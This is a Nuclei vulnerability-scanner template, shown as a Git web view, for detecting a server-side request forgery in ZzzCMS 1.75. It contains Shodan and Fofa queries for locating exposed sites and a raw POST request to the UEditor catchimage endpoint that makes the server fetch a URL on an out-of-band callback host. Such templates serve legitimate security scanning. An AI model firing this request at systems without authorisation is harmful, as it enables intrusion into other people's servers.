nuclei-templates/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml

45 lines
955 B
YAML
Raw Normal View History

2023-08-07 17:56:09 +00:00
id: zzzcms-ssrf
info:
name: ZzzCMS 1.75 - Server-Side Request Forgery
author: ritikchaddha
severity: high
reference:
- https://www.hacking8.com/bug-web/Zzzcms/Zzzcms-1.75-ssrf.html
metadata:
max-request: 1
verified: true
shodan-query: html:"ZzzCMS"
fofa-query: title="ZzzCMS"
2023-08-07 18:19:51 +00:00
tags: zzzcms,ssrf,oast
variables:
filename: "{{to_lower(rand_text_alpha(4))}}"
2023-08-07 17:56:09 +00:00
http:
- raw:
- |
POST /plugins/ueditor/php/controller.php?action=catchimage&upfolder=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2023-08-07 18:19:51 +00:00
source[0]=http://{{interactsh-url}}/{{filename}}.txt
2023-08-07 17:56:09 +00:00
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- '{"state":'
- 'list":'
condition: and
- type: status
status:
- 200